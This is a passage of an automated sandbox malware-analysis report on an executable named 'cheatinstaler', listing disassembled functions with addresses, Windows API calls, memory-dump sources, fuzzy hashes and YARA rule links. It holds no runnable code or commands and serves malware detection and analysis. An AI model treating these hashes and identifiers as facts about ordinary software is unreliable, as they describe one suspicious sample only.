                                                                                                  • Instruction ID: fd230c09a97c71d4beb4164b6ffa3d70f08db5c5d62403dc8e2c0c7beaaa86dc
                                                                                                  • Opcode Fuzzy Hash: af39ee99099a55e795e80951e1502b6695bf377bb292aa42fe2ae5656993095e
                                                                                                  • Instruction Fuzzy Hash: 53D1D672B0868256EB688F2796442B977A5FB05B86F048035EBDD877A5CF3CE461B301
                                                                                                  Function 00007FF6C16C5294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017591355-0
                                                                                                  • Opcode ID: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
                                                                                                  • Instruction ID: 36d19c73f0f240365d56f32264b166b078cfcf7c03962b2abe132409fcc30631
                                                                                                  • Opcode Fuzzy Hash: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
                                                                                                  • Instruction Fuzzy Hash: 9961D111B0D647C1FF64BE279C2427A9A91AF45BD7F148131EECDC6AC6EE7CE441A200
                                                                                                  Function 00007FF6C16D1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16CE948: ReleaseSemaphore.KERNEL32 ref: 00007FF6C16CE974
                                                                                                    • Part of subcall function 00007FF6C16CE948: FindCloseChangeNotification.KERNELBASE ref: 00007FF6C16CE993
                                                                                                    • Part of subcall function 00007FF6C16CE948: DeleteCriticalSection.KERNEL32 ref: 00007FF6C16CE9AA
                                                                                                    • Part of subcall function 00007FF6C16CE948: CloseHandle.KERNEL32 ref: 00007FF6C16CE9B7
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16D1ACB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1624603282-0
                                                                                                  • Opcode ID: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
                                                                                                  • Instruction ID: ba36441886d4524c6d7f7ed971185f80a053bbad27ce62237e03fe8e180f8568
                                                                                                  • Opcode Fuzzy Hash: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
                                                                                                  • Instruction Fuzzy Hash: 9361E062B15A8596EF08EF66D5540BC7365FF41B81B284236EBED8BAC1CF68E4709300
                                                                                                  Function 00007FF6C16BEC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: d7b1a399856acf99fdb305a598bd345408e38bb8b7611d952776f17d246575aa
                                                                                                  • Instruction ID: 61846bd090d3420bfc99de9b94696339f77fbba32105119249a8160f56654d3e
                                                                                                  • Opcode Fuzzy Hash: d7b1a399856acf99fdb305a598bd345408e38bb8b7611d952776f17d246575aa
                                                                                                  • Instruction Fuzzy Hash: 0D51C162A0868280EF14AF27D4553A96751FB86BC6F444136FEDD87396CF3DE486E340
                                                                                                  Function 00007FF6C16BE7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16C3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6C16D0811), ref: 00007FF6C16C3EFD
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16BE993
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1011579015-0
                                                                                                  • Opcode ID: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                                                                                                  • Instruction ID: a49ce5a471473349887f16e4ff4b72f19700918a785411525823a4b14318cbc1
                                                                                                  • Opcode Fuzzy Hash: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                                                                                                  • Instruction Fuzzy Hash: 85518F22A08A8681FB60DF26D44537D23A1FF85B86F440236FACD877A6DF2CD441E750
                                                                                                  Function 00007FF6C16C1794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: 60c8fe66f84878668f1e37175277eb608c06b9d2d44befc405cc34de4c74e42f
                                                                                                  • Instruction ID: ab939047dea406f390569ebb4352ab8240e5383d844da572ed75476ee6b94da3
                                                                                                  • Opcode Fuzzy Hash: 60c8fe66f84878668f1e37175277eb608c06b9d2d44befc405cc34de4c74e42f
                                                                                                  • Instruction Fuzzy Hash: F241D462B18A9182EF149E17AA1037AA255AB85BC1F448535EECC87F4ADF3CD5929340
                                                                                                  Function 00007FF6C16C2F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
                                                                                                  • Instruction ID: 190042b11f216e2a9bc57fea4a6a86a84b39d568d18338cc7e39fa77824638f7
                                                                                                  • Opcode Fuzzy Hash: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
                                                                                                  • Instruction Fuzzy Hash: 4741DF63A08B0680EF10AF2AE5653796361FB85BD9F044139EEDD87699DF3DE480D640
                                                                                                  Function 00007FF6C16EBDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 3947729631-0
                                                                                                  • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                                  • Instruction ID: 8a565399adac73e201b3c8f567b108f41a5ddc363b70bb87eaa31ffd2d1b13d1
                                                                                                  • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                                  • Instruction Fuzzy Hash: 0C41B122A1875282FB24DF279C502782261AF94B82F544536DACDC76E6DF3DEA41E7C0
                                                                                                  Function 00007FF6C16B129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 680105476-0
                                                                                                  • Opcode ID: 8615e64c65e08c4765cb9fe696173ca1d24e70e0804716bd186f62c3c2783a0a
                                                                                                  • Instruction ID: 73a47172d6228e159a50cb0f1eb4716f769095f9e26f25fd4ba8aee88d748e0f
                                                                                                  • Opcode Fuzzy Hash: 8615e64c65e08c4765cb9fe696173ca1d24e70e0804716bd186f62c3c2783a0a
                                                                                                  • Instruction Fuzzy Hash: 3121AE22A0925195EB149E93B4002796250BF06BF1F680B31EFFE87BC1EE7CE491A340
                                                                                                  Function 00007FF6C16B2C54 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: 31b34ebacb9280de439ed9c8253ac234116577bf367a3ee86a8e065c3418b0aa
                                                                                                  • Instruction ID: c23b4c738114662cf32f6fc56c8e4abc46f069b6655eac17cb47c68bdfdf4429
                                                                                                  • Opcode Fuzzy Hash: 31b34ebacb9280de439ed9c8253ac234116577bf367a3ee86a8e065c3418b0aa
                                                                                                  • Instruction Fuzzy Hash: 2A217822B24582A2EB08EF62D5583F86365FF44786F944435E7DD876A2DF3CA5A4E300
                                                                                                  Function 00007FF6C16F124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 3215553584-0
                                                                                                  • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                                  • Instruction ID: 3d373e12c116829058afabf060178db3c9edb818b098356e8bffa6df79e5ccbd
                                                                                                  • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                                  • Instruction Fuzzy Hash: 11119D76A0C78282F7109F92A84027972A4FF413C2F544135EAEDC7796DF3CE980AB40
                                                                                                  Function 00007FF6C16B3AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                                                                                                  • Instruction ID: d94e70d9af6f1ea881553e2ff05ac4ba7d791599a02eb3a7c14e09c2676c10da
                                                                                                  • Opcode Fuzzy Hash: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                                                                                                  • Instruction Fuzzy Hash: 3C01A162B1868581EB119B2AE4452297361FF99791F409331E6DC47BA9DF2CE1409704
                                                                                                  Function 00007FF6C16E1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16E1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6C16E1573,?,?,?,00007FF6C16E192A), ref: 00007FF6C16E162B
                                                                                                  • DloadProtectSection.DELAYIMP ref: 00007FF6C16E15C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DloadHandleModuleProtectSection
                                                                                                  • String ID:
                                                                                                  • API String ID: 2883838935-0
                                                                                                  • Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                                  • Instruction ID: ec450702fe57f0b14b8c4726641dd2e3b249c7d85a8bf17227a2e69e96b20697
                                                                                                  • Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                                  • Instruction Fuzzy Hash: CA11BEA0E0854741FB609F17A8643B02350EF1534BF380534C9DDC62A6FF3CE5A5E650
                                                                                                  Function 00007FF6C16EFA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                                  • Instruction ID: b2450e8314e6f15495589f80d8ca1c6c3345e2e92350749f2fa3fa278bd19a2f
                                                                                                  • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                                  • Instruction Fuzzy Hash: 3FF06D90B1A20786FF545F6B9D113B412805F44B82F0C56B0CDCECE3C2EE2CE7816290
                                                                                                  Function 00007FF6C16C3EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16C40BC: FindFirstFileW.KERNELBASE ref: 00007FF6C16C410B
                                                                                                    • Part of subcall function 00007FF6C16C40BC: FindFirstFileW.KERNEL32 ref: 00007FF6C16C415E
                                                                                                    • Part of subcall function 00007FF6C16C40BC: GetLastError.KERNEL32 ref: 00007FF6C16C41AF
                                                                                                  • FindClose.KERNELBASE(?,?,00000000,00007FF6C16D0811), ref: 00007FF6C16C3EFD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1464966427-0
                                                                                                  • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                                  • Instruction ID: 3940b5db54bdf4b7854d6af9867ed0f0f3f5a4a54c88f8fac3e16ae421516981
                                                                                                  • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                                  • Instruction Fuzzy Hash: 5AF0A46250828285EF10BF76A1142B93760AB15BB5F149334EAFD473C7CE2CD444D744
                                                                                                  Function 00007FF6C16ED94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
